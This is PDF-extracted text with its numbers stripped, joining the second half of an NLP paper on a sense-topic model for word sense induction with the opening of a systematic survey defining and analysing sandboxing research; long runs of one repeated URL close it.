for ease of comparison, we also report the geometric mean of the metrics, which we denote by avg. semeval- task also provided a trial dataset (trial) that consists of eight target ambigu- ous words, each with instances (erk et al., ). we use it for preliminary experiments of our model and for tuning certain hyperparameters, and evalu- ate final performance on the semeval- dataset (test) with target words. we do not use an arithmetic mean because the effective range of the two metrics is substantially different. s b-cubed(%) nmi(%) avg . . . . . . . . . . . . . . . table : performance on trial for the sense-topic model with different numbers of senses (s). best score in each column is bold. hyperparameter tuning we use trial to ana- lyze performance of our sense-topic model under different settings for the numbers of senses (s) and topics (t ); see table . we always set t = s for simplicity. we find that small s values work best, which is unsurprising considering the relatively small number of instances and small size of each in- stance. when evaluating on test, we use s = (which gives the best avg results on trial). later, when we add larger context or more instances (see § ), tuning on trial chooses a larger s value. during inference, the gibbs sampler was run for , iterations for each target word, setting the first iterations as the burn-in period. in order to get a representative set of samples, every th sample (af- ter burn-in) is saved to prevent correlations among samples. due to the randomized nature of the in- ference procedure, all reported results are average scores over runs. the hyperparameters (α) for all dirichlet priors in our model are set to the (untuned) value of . , following prior work on topic model- ing (griffiths and steyvers, ; heinrich, ). baselines we include two naı̈ve baselines corre- sponding to the two extremes (biases) preferred by fuzzy b-cubed and nmi, respectively: sense (la- bel each instance with the same single sense) and all distinct (label each instance with its own sense). we also consider two baselines based on lda. we run lda for each target word in test, using the set of instances as the set of documents. we treat the learned topics as induced senses. when setting the number of topics (senses), we use the gold-standard number of senses for each target word, making this baseline unreasonably strong. we run lda both with full context (full) and local context (local), using the same window size as above ( words be- fore and after the target word). we also present results for the two best systems in the semeval- task (according to fuzzy b- cubed and fuzzy nmi, respectively): unimelb and ai-ku. as described in section , unimelb uses hierarchical dirichlet processes (hdps). it extracts , extra instances for each target word as train- ing data from the ukwac corpus−a web corpus of approximately billion tokens. among all systems in the task, it performs best according to fuzzy b- cubed. ai-ku is based on a lexical substitution method; a language model is built to identify lexical substitutes for target words from the dataset and the ukwac corpus. it performed best among all systems according to fuzzy nmi. results in table , we present results for these systems and compare them to our basic (i.e., without any data enrichment) sense-topic model with s = (row ). according to both fuzzy b-cubed and fuzzy nmi, our model outperforms the other wsi systems (lda, ai-ku, and unimelb). hence, we are able to achieve state-of-the-art results on the semeval- task even when only using the single sentence of context given in each instance (while ai-ku and unimelb use large training sets from ukwac). we found similar performance improvements when only tested on instances labeled with a single sense. bidirectionalilty analysis to measure the impact of the bidirectional dependency between the topic and sense variables in our model, we also evalu- ate the performance of our sense-topic model when dropping one of the directions. in table , we compare their performance with our full sense-topic model on test. both unidirectional models perform worse than the full model, and dropping t → s hurts more. this result verifies our intuition that topics would help narrow down the set of likely senses, and suggests that bidirectional modeling between topic and sense is desirable for wsi. in subsequent sections, we investigate several ways of exploiting additional data to build better- performing sense-topic models. unsupervised data enrichment the primary signal used by our model is word co- occurrence information across instances. if we en- http://wacky.sslmit.unibo.it/doku.php? id=corpora http://wacky.sslmit.unibo.it/doku.php?id=corpora http://wacky.sslmit.unibo.it/doku.php?id=corpora model data enrichment fuzzy b-cubed % fuzzy nmi % avg sense – . – all distinct – . – unimelb add k instances . . . ai-ku add k instances . . . lda (local) none . . . lda (full) none . . . lda (full) add actual context (§ . ) . . . word embedding product (§ . ) none . . . this paper sense-topic model none . . . add ukwac context (§ . ) . . . add actual context (§ . ) . . . add instances (§ . ) . . . weight by sim. (§ . ) . . . table : performance on test for baselines and our sense-topic model. best score in each column is bold. model b-cubed(%) nmi(%) avg drop s → t . . . drop t → s . . . full . . . table : performance on test for the sense-topic model with ablation of links between sense and topic variables. rich the instances, we can have more robust co- occurrence statistics. the semeval- dataset may be too small to induce meaningful senses, since there are only about instances for each target word, and each instance only contains one sentence. this is why most shared task systems added in- stances from external corpora. in this section, we consider three unsupervised ways of enriching data and measure their impact on performance. in § . we augment the context of each instance in our original dataset while keeping the number of instances fixed. in § . we collect more instances of each target word from ukwac, similar to the ai-ku and unimelb systems. in § . , we change the distribution of words in each in- stance based on their similarity to the target word. throughout, we make use of word embeddings (see § ). we trained -dimensional skip-gram vectors (mikolov et al., ) on english wikipedia (tokenized/lowercased, resulting in . b tokens of text) using window size , hierarchical softmax, and no downsampling. we used a minimum count cutoff of during training, . adding context the first way we explore of enriching data is to add a broader context for each instance while keeping the number of instances unchanged. this will intro- duce more word tokens into the set of global con- text words, while keeping the set of local context words mostly unchanged, as the window size we use is typically smaller than the length of the original in- stance. with more global context words, the model has more evidence to learn coherent topics, which could also improve the induced senses via the con- nection between sense and topic. the ideal way of enriching context for an instance is to add its actual context from the corpus from which it was extracted. to do this for the semeval- task, we find each instance in the oanc and retrieve three sentences before the instance and three sentences after. while not provided for the semeval task, it is reasonable to assume this larger context in many real-world applications, such as information retrieval and machine translation of documents. however, in other settings, the corpus may only have a single sentence containing the target word (e.g., search queries or machine translation of sen- tences). to address this, we find a semantically- similar sentence from the english ukwac corpus and append it to the instance as additional context. for each instance in the original dataset, we extract its then only retained vectors for the most frequent , word types, averaging the rest to get a vector for unknown words. most similar sentence that contains the same target word and add it to increase its set of global context words. to compute similarity, we first represent in- stances and ukwac sentences by summing the word embeddings across their word tokens, then compute cosine similarity. the ukwac sentence (s∗) with the highest cosine similarity to each original instance (d) is appended to that instance: s∗ = arg maxs∈ukwac sim(d,s) results since the vocabulary has increased, we expect we may need larger values for s and t . on trial, we find best performance for s = , so we run on test with this value. performance is shown in table (rows and ). these two meth- ods have higher avg scores than all others. both their fuzzy b-cubed and nmi improvements over the baselines and previous wsi systems are statisti- cally significant, as measured by a paired bootstrap test (p < . ; efron and tibshirani, ). it is unsurprising that we find best performance with actual context. interestingly, however, we can achieve almost the same gains when automati- cally finding relevant context from a different cor- pus. thus, even in real-world settings where we only have a single sentence of context, we can induce substantially better senses by automatically broad- ening the global context in an unsupervised manner. as a comparative experiment, we also evaluate the performance of lda when adding actual con- text (table , row ). compared with lda with full context (full) in row , performance is slightly improved, perhaps due to the fact that longer con- texts induce more accurate topics. however, those topics are not necessarily related to senses, which is why lda with only local context actually per- forms best among all three lda models. thus we see that merely adding context does not necessarily help topic models for wsi. importantly, since our model includes both sense and topic, we are able to leverage the additional context to learn better top- ics while also improving the quality of the induced senses, leading to our strongest results. examples we present examples to illustrate our sense-topic model’s advantage over lda and the further improvement when adding actual context. consider instances ( ) and ( ) below, with target word occurrences in bold: ( ) nigeria then sent troops to challenge the coup, evi- dently to restore the president and repair nigeria’s corrupt image abroad. (image% : : ::/ ) ( ) when asked about the bible’s literal account of creation, as opposed to the attractive concept of divine creation, every major republican presiden- tial candidate—even bauer—has squirmed, ducked, and tried to steer the discussion back to “faith,” “morals,” and the general idea that humans “were created in the image of god.” (image% : : ::/ image% : : ::/ ) both instances share the common word stem pres- ident. lda uses this to put these two instances into the same topic (i.e., sense). in our sense-topic model, president is a local context word in instance ( ) but a global context word in instance ( ). so the effect of sharing words is decreased, and these two instances are assigned to different senses by our model. according to the gold standard, the two in- stances are annotated with different senses, so our sense-topic model provides the correct prediction. next, consider instances ( ), ( ), and ( ): ( ) i have recently deliberately begun to use variations of “kick ass” and “bites x in the ass” because they are colorful, evocative phrases; because, thanks to south park, ass references are newly familiar and hilarious and because they don’t evoke partic- ularly vivid mental image of asses any longer. (im- age% : : ::/ ) ( ) also, playing video games that require rapid mental rotation of visual image enhances the spatial test scores of boys and girls alike. (image% : : ::/ ) ( ) practicing and solidifying modes of representa- tion, piaget emphasized, make it possible for the child to free thought from the here and now; cre- ate larger images of reality that take into account past, present, and future; and transform those im- age mentally in the service of logical thinking. (im- age% : : ::/ ) in the gold standard, instances ( ) and ( ) have dif- ferent senses while ( ) and ( ) have the same sense. however, sharing the local context word “mental” this is the gold standard sense label, where im- age% : : :: indexes the wordnet senses, and is the score assigned by the annotators.the possible range of a score is [ , ]. triggers both lda and our sense-topic model to as- sign them to the same sense label with high proba- bility. when augmenting the instances by their real contexts, we have a better understanding about the topics. instance ( ) is about phrase variations, in- stance ( ) is about enhancing boys’ spatial skills, while instance ( ) discusses the effect of make- believe play for children’s development. when lda is run with the actual context, it leaves ( ) and ( ) in the same topic (i.e., sense), while as- signing ( ) into another topic with high probability. this could be because ( ) and ( ) both relate to child development, and therefore lda considers them as sharing the same topic. however, topic is not the same as sense, especially when larger contexts are available. our sense-topic model built on the ac- tual context makes correct predictions, leaving ( ) and ( ) into the same sense cluster while labeling ( ) with a different sense. . adding instances we also consider a way to augment our dataset with additional instances from an external corpus. we have no gold standard senses for these instances, so we will not evaluate our model on them; they are merely used to provide richer co-occurrence statis- tics about the target word so that we can perform better on the instances on which we evaluate. if we added randomly-chosen instances (contain- ing the target word), we would be concerned that the learned topics and senses may not reflect the distri- butions of the original instance set. so we only add instances that are semantically similar to instances in our original set (moore and lewis, ; chambers and jurafsky, ). also, to avoid changing the original sense distribution by adding too many in- stances, we only add a single instance for each orig- inal instance. as in § . , for each instance in the original dataset, we find the most similar sentence in ukwac for each instance using word embeddings and add it into the dataset. therefore, the number of instances is doubled, and we use the enriched dataset for our sense-topic model. results similarly to § . , on trial, we find best performance for s = , so we run on test with this value. as shown in table (row ), this improves fuzzy b-cubed by . %, but fuzzy nmi is lower, making the avg worse than the original model. a possible reason for this is that the sense distribution in the added instances disturbs that in the original set of instances, even though we picked the most semantically similar ones to add. . weighting by word similarity another approach is inspired by the observation that each local context token is treated equally in terms of its contribution to the sense. however, our intu- ition is that certain tokens are more indicative than others. consider the target word window. since glass evokes a particular sense of window, we would like to weight it more highly than, say, day. to measure word relatedness, we use cosine sim- ilarity of word embeddings. we (softly) replicate each local context word according to its exponenti- ated cosine similarity to the target word. the result is that the local context in each instance has been modified to contain fewer occurrences of unrelated words and more occurrences of related words. if each cosine similarity is , we obtain our original sense-topic model. during inference, the posterior sense distribution for instance d is now given by: pr(s = k|d, ·) = ∑ w∈d` exp(sim(w,w ∗)) sw=k + α∑ w′∈d` exp(sim(w ′,w∗)) + sα ( ) where d` is the set of local context tokens in d, sim(w,w∗) is the cosine similarity between w and target word w∗, and sw=k is an indicator returning when w is assigned to sense k and otherwise. the posterior distribution of sampling a token of word wi from sense k becomes: cwsik exp(sim(wi,w ∗)) + α ∑ws i′= c ws i′k exp(sim(wi′,w ∗)) + wsα ( ) where cwsik counts the number of times wi is as- signed to sense k. results we again use trial to tune s (and still use t = s). we find best trial performance at s = ; this is unsurprising since this approach does not change the vocabulary. in table , we present re- sults on test with s = (row ). we also report cosine similarities range from - to , so we use exponen- tiation to ensure we always use positive counts. sense top- terms per sense sense-topic model include, depict, party, paint, visual zero, manage, company, culture, figure create, clinton, people, american, popular +weight by similarity (§ . ) depict, create, culture, mental, include picture, visual, pictorial, matrix, movie public, means, view, american, story table : top terms for each sense induced for the noun image by the sense-topic model and when weighting local context words by similarity. s = for both. an additional baseline: “word embedding product” (row ), where we represent each instance by mul- tiplying (element-wise) the word vectors of all lo- cal context words, and then feed the instance vectors into the fuzzy c-means clustering algorithm (pal and bezdek, ), c = . compared to this baseline, our approach improves . % on average; compared with results for the original sense-topic model (row ), this approach improves . % on average. in table we show the top- terms for each sense induced for image, both for the original sense-topic model and when additionally weighting by similar- ity. we find that the original model provides less distinguishable senses, as it is difficult to derive sep- arate senses from these top terms. in contrast, senses learned from the model with weighted similarities are more distinct. sense relates to mental repre- sentation; sense is about visual representation pro- duced on a surface; and sense is about the general impression that something presents to the public. conclusions and future work we presented a novel sense-topic model for the problem of word sense induction. we considered sense and topic as distinct latent variables, defining a model that generates global context words using topic variables and local context words using both topic and sense variables. sense and topic are re- lated using a bidirectional dependency with a robust parameterization based on deficient modeling. we explored ways of enriching data using word embeddings from neural language models and exter- nal corpora. we found enriching context to be most effective, even when the original context of the in- stance is not available. evaluating on the semeval- wsi dataset, we demonstrate that our model yields significant improvements over current state- of-the-art systems, giving . % fuzzy b-cubed and . % fuzzy nmi in our best setting. moreover, we find that modeling both sense and topic is critical to enable us to effectively exploit broader context, showing that lda does not improve when each in- stance is enriched by actual context. in future work, we plan to further explore the space of sense-topic models, including non-deficient models. one possibility is to use “switching vari- ables” (paul and girju, ) to choose whether to generate each word from a topic or sense, with a stronger preference to generate from senses closer to the target word. another possibility is to use locally- normalized log-linear distributions and include fea- tures pairing words with particular senses and topics, rather than redundant generative steps. appendix a the plate diagram for the complete sense-topic model is shown in figure . figure : plate notation for the proposed sense-topic model with all variables (except α, the fixed dirichlet hyperparameter used as prior for all multinomial distri- butions). each instance has topic mixing proportions θt and sense mixing proportions θs. the instance set shares sense/topic parameter θst, topic-sense distribution θs|t, sense-topic distribution θt|s, topic-word distribution ψt, and sense-word distribution ψs. acknowledgments we thank the editor and the anonymous reviewers for their helpful comments. this research was par- tially supported by nih lm . the opinions expressed in this work are those of the authors and do not necessarily reflect the views of the funding agency. references e. agirre and a. soroa. . semeval- task : evaluating word sense induction and discrimination systems. in proc. of semeval, pages – . c. akkaya, j. wiebe, and r. mihalcea. . utilizing semantic composition in distributional semantic mod- els for word sense discrimination and word sense dis- ambiguation. in proc. of icsc, pages – . m. bansal, k. gimpel, and k. livescu. . tailoring continuous word representations for dependency pars- ing. in proc. of acl, pages – . o. baskaya, e. sert, v. cirik, and d. yuret. . ai- ku: using substitute vectors and co-occurrence mod- eling for word sense induction and disambiguation. in proc. of semeval, pages – . y. bengio, r. ducharme, p. vincent, and c. janvin. . a neural probabilistic language model. j. mach. learn. res., : – . d. m. blei, a. y. ng, and m. i. jordan. . la- tent dirichlet allocation. j. mach. learn. res., : – . j. boyd-graber and d. m. blei. . putop: turning predominant senses into a topic model for word sense disambiguation. in proc. of semeval, pages – . j. boyd-graber, d. m. blei, and x. zhu. . a topic model for word sense disambiguation. in proc. of emnlp-conll, pages – . s. brody and m. lapata. . bayesian word sense induction. in proc. of eacl, pages – . p. f. brown, s. a. della pietra, v. j. della pietra, and r. l. mercer. . the mathematics of statistical machine translation: parameter estimation. computa- tional linguistics, ( ): – . j. f. cai, w. s. lee, and y. w. teh. . improving word sense disambiguation using topic features. in proc. of emnlp-conll, pages – . m. carpuat and d. wu. . word sense disambigua- tion vs. statistical machine translation. in proc. of acl, pages – . m. carpuat and d. wu. . improving statistical ma- chine translation using word sense disambiguation. in proc. of emnlp-conll, pages – . n. chambers and d. jurafsky. . template-based information extraction without the templates. in proc. of acl, pages – . r. collobert, j. weston, l. bottou, m. karlen, k. kavukcuoglu, and p. kuksa. . natural lan- guage processing (almost) from scratch. j. mach. learn. res., : – . p. dhillon, j. rodu, d. foster, and l. ungar. . two step cca: a new spectral method for estimating vec- tor models of words. in icml, pages – . b. dorow and d. widdows. . discovering corpus- specific word senses. in proc. of eacl, pages – . b. efron and r. j. tibshirani. . an introduction to the bootstrap, volume . crc press. k. erk and d. mccarthy. . graded word sense as- signment. in proc. of emnlp, pages – . k. erk, d. mccarthy, and n. gaylord. . investi- gations on word senses and word usages. in proc. of acl, pages – . s. geman and d. geman. . stochastic relax- ation, gibbs distributions, and the bayesian restoration of images. ieee trans. pattern anal. mach. intell., ( ): – . t. l. griffiths and m. steyvers. . finding scien- tific topics. proc. of the national academy of sciences of the united states of america, (suppl ): – . d. heckerman, d. m. chickering, c. meek, r. roun- thwaite, and c. kadie. . dependency networks for inference, collaborative filtering, and data visual- ization. j. mach. learn. res., : – . g. heinrich. . parameter estimation for text analy- sis. technical report. s. hisamoto, k. duh, and y. matsumoto. . an em- pirical investigation of word representations for pars- ing the web. in anlp. n. ide and k. suderman. . the american national corpus first release. in proc. of lrec, pages – . d. jurgens and i. klapaftis. . semeval- task : word sense induction for graded and non-graded senses. in proc. of semeval, pages – . d. jurgens. . embracing ambiguity: a comparison of annotation methodologies for crowdsourcing word sense labels. in proc. of naacl, pages – . d. klein and c. d. manning. . a generative constituent-context model for improved grammar in- duction. in proc. of acl, pages – . j. h. lau, p. cook, d. mccarthy, d. newman, and t. baldwin. . word sense induction for novel sense detection. in proc. of eacl, pages – . j. h. lau, p. cook, and t. baldwin. . unimelb: topic modelling-based word sense induction. in proc. of semeval, pages – . l. li, b. roth, and c. sporleder. . topic models for word sense disambiguation and token-based idiom detection. in proc. of acl, pages – . y. maron, e. bienenstock, and m. james. . sphere embedding: an application to part-of-speech induc- tion. in advances in nips . j. may and k. knight. . syntactic re-alignment models for machine translation. in proc. of emnlp- conll, pages – . t. mikolov, k. chen, g. corrado, and j. dean. . efficient estimation of word representations in vector space. in proc. of iclr. g. a. miller, r. beckwith, c. fellbaum, d. gross, and k. j. miller. . wordnet: an on-line lexical database. international journal of lexicography, ( ). a. mnih and g. hinton. . three new graphical models for statistical language modelling. in proc. of icml, pages – . r. c. moore and w. lewis. . intelligent selection of language model training data. in proc. of acl, pages – . n. r. pal and j. c. bezdek. . on cluster validity for the fuzzy c-means model. trans. fuz sys., : – . p. pantel and d. lin. . discovering word senses from text. in proc. of kdd, pages – . r. j. passonneau, a. salleb-aoussi, v. bhardwaj, and n. ide. . word sense annotation of polysemous words by multiple annotators. in proc. of lrec. m. paul and r. girju. . cross-cultural analysis of blogs and forums with mixed-collection topic models. in proc. of emnlp, pages – . a. purandare and t. pedersen. . word sense dis- crimination by clustering contexts in vector and simi- larity spaces. in proc. of conll, pages – . m. sahlgren. . the word-space model: us- ing distributional analysis to represent syntagmatic and paradigmatic relations between words in high- dimensional vector spaces. ph.d. dissertation, stock- holm university. h. schütze. . automatic word sense discrimination. comput. linguist., ( ): – . y. w. teh, m. i. jordan, m. j. beal, and d. m. blei. . hierarchical dirichlet processes. journal of the amer- ican statistical association, : – . k. toutanova and m. johnson. . a bayesian lda- based model for semi-supervised part-of-speech tag- ging. in advances in nips . j. turian, l. ratinov, and y. bengio. . word rep- resentations: a simple and general method for semi- supervised learning. in proc. of acl, pages – . j. véronis. . hyperlex: lexical cartography for in- formation retrieval. computer speech & language, ( ): – . d. vickrey, l. biewald, m. teyssier, and d. koller. . word-sense disambiguation for machine translation. in proc. of hlt-emnlp, pages – . e. m. voorhees. . using wordnet to disambiguate word senses for text retrieval. in proc. of sigir, pages – . x. yao and b. van durme. . nonparamet- ric bayesian word sense induction. in proc. of textgraphs- : graph-based methods for natural lan- guage processing, pages – . a systematic analysis of the science of sandboxing submitted october accepted december published january corresponding author michael maass, mmaass@andrew.cmu.edu academic editor cynthia irvine additional information and declarations can be found on page doi . /peerj-cs. copyright maass et al. distributed under creative commons cc-by . open access a systematic analysis of the science of sandboxing michael maass , adam sales , benjamin chung and joshua sunshine institute for software research, school of computer science, carnegie mellon university, pittsburgh, pa, united states statistics department, carnegie mellon university, pittsburgh, pa, united states abstract sandboxes are increasingly important building materials for secure software systems. in recognition of their potential to improve the security posture of many systems at various points in the development lifecycle, researchers have spent the last several decades developing, improving, and evaluating sandboxing techniques. what has been done in this space? where are the barriers to advancement? what are the gaps in these efforts? we systematically analyze a decade of sandbox research from five top-tier security and systems conferences using qualitative content analysis, statistical clustering, and graph-based metrics to answer these questions and more. we find that the term “sandbox” currently has no widely accepted or acceptable definition. we use our broad scope to propose the first concise and comprehensive definition for “sandbox” that consistently encompasses research sandboxes. we learn that the sandboxing landscape covers a range of deployment options and policy enforce- ment techniques collectively capable of defending diverse sets of components while mitigating a wide range of vulnerabilities. researchers consistently make security, performance, and applicability claims about their sandboxes and tend to narrowly define the claims to ensure they can be evaluated. those claims are validated using multi-faceted strategies spanning proof, analytical analysis, benchmark suites, case studies, and argumentation. however, we find two cases for improvement: ( ) the arguments researchers present are often ad hoc and ( ) sandbox usability is mostly uncharted territory. we propose ways to structure arguments to ensure they fully support their corresponding claims and suggest lightweight means of evaluating sandbox usability. subjects security and privacy, operating systems, software engineering keywords sandboxing, qualitative content analysis, software protection, access control, security, security validation introduction sandboxes can be found where software components must be used but cannot currently be verified or trusted. sandboxed components are often feared to be either malicious or vulnerable to attack. for example, popular browser engines (e.g., google chrome and internet explorer), productivity software (e.g., microsoft word and adobe reader), and operating system kernels (e.g., windows ) have all been sandboxed to varying degrees. virtual machines, which run software on simulated hardware separate from the rest of the how to cite this article maass et al. ( ), a systematic analysis of the science of sandboxing. peerj comput. sci. :e ; doi . /peerj-cs. mailto:mmaass@andrew.cmu.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. host system, are commonly used in malware analysis to contain malicious computations (e.g., cuckoo) and sandboxes are used in mobile ecosystems (e.g., android) to limit the havoc malicious applications can wreak on a device. sandboxes provide some salvation in a world full of complex components: instead of vetting intractably enigmatic software systems, sandbox them and vet the relatively simple sandbox. what else do sandboxes in mainstream use have in common? they are largely dependent on relatively easily composed coarse-grained operating system features, they are essentially transparent to the users of sandboxed components, and they make little use of decades worth of research produced within the domain of software security sandboxing. researchers have spent the last several decades building sandboxes capable of containing computations ranging from fully featured desktop applications to subsets of nearly every kind of application in existence, from third party libraries in java programs to ads on web sites. sandboxes have been built to stop memory corruption exploits, ensure control- and data-flow integrity, enforce information flow constraints, introduce diversity where monocultures previously existed, and much more. what more can the community do to bring value? in this paper, we use multidisciplinary techniques from software engineering, statistics, the social sciences, and graph analysis to systematically analyze the sandboxing landscape as it is reflected by five top-tier security and systems conferences. we aim to answer questions about what sandboxes can already do, how they do it, what it takes to use them, what claims sandbox inventors make about their creations, and how those claims are validated. we identify and resolve ambiguity in definitions for “sandbox”, systematize ten years of sandbox research, and point out gaps in our current practices and propose ways forward in resolving them. we contribute the following: • a multi-disciplinary methodology for systematically analyzing the state of practice in a research domain (‘methodology’). • the first concise definition for “sandbox” that consistently describes research sandboxes (‘what is a sandbox’). • systemization of the research sandboxing landscape (‘results’). • identification of and proposed solutions to ( ) an over-reliance on ad hoc arguments for security validation and ( ) the neglect of sandbox and policy usability (‘strengthening sandboxing results’). what is a sandbox? in order to systematically analyze the “sandboxing” landscape we need to clarify the meaning of the term. we reviewed definitions used by practitioners and in papers within the field, both in the substance of the definitions and in their quality as definitions. this section reviews those definitions and establishes a definition for our use here, which we advance as an improved definition for the field. a definition should be a concise statement of the exact meaning of a word and may be accompanied by narration of some properties implied by the definition. in this case, it maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. should clearly distinguish between mechanisms that are and are not sandboxes. to gain widespread use, a new definition must include all mechanisms that are already widely considered to be sandboxes. in software security contexts, the term “sandboxing” has grown ambiguous. in an early published use, it described an approach for achieving fault isolation (wahbe et al., ). discussions where practicing programmers are trying to understand what sandboxing is often fail to achieve a precise resolution and instead describe the term by listing products that are typically considered to be sandboxes or cases where sandboxes are often used (http://stackoverflow.com/questions/ /what-is-sandboxing, http://security. stackexchange.com/questions/ /are-sandboxes-overrated, http://en.wikipedia.org/ w/index.php?title=sandbox (computer security)&oldid= ). however, we did find cases where attempts were made at a concise and general definition. a representative and accepted stackoverflow answer (http://security.stackexchange.com/questions/ / what-is-sandboxing) started with, “in the context of it security, ‘sandboxing’ means isolating some piece of software in such a way that whatever it does, it will not spread havoc elsewhere”—a definition that is not sufficiently precise to separate sandboxes from other defensive measures. even recently published surveys of sandbox literature have either acknowledged the ambiguity, then used overly-broad definitions that include mechanisms not traditionally considered to be sandboxes (schreuders, mcgill & payne, ), or have relied entirely on the use of examples instead of a precise definition (al ameiri & salah, ). schreuders writes, “although the terminology in use varies, in general a sandbox is separate from the access controls applied to all running programs. typically sandboxes only apply to programs explicitly launched into or from within a sandbox. in most cases no security context changes take place when a new process is started, and all programs in a particular sandbox run with the same set of rights. sandboxes can either be permanent where resource changes persist after the programs finish running, or ephemeral where changes are discarded after the sandbox is no longer in use. . . . ” this definition suffers from three problems. first, it is still overly reliant on examples and thus is unlikely to capture all security mechanisms that are uncontroversially called sandboxes. along the same lines, characterizations prefaced with, “in most cases . . . ”, are not precise enough to reliably separate sandboxes from non-sandboxes. finally, the comparison to access controls is not conclusive because it does not clarify which, if any, access control mechanisms applied to a subset of running programs are not sandboxes. in this section we aim to resolve this ambiguity to lay the groundwork for our analysis’s inclusion criteria. while this definition serves our purposes, we believe it can strengthen future attempts to communicate scientifically about sandboxes by adding additional precision. we derive a clear, concise definition for what a “sandbox” is using papers that appear in five top-tier security and operating system conferences, selected because their topics of interest are broad enough to include sandboxing papers most years. while we do not attempt to thoroughly validate our definition using commercial and open source sandboxes, it does encompass the tools with which we are most familiar. maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ 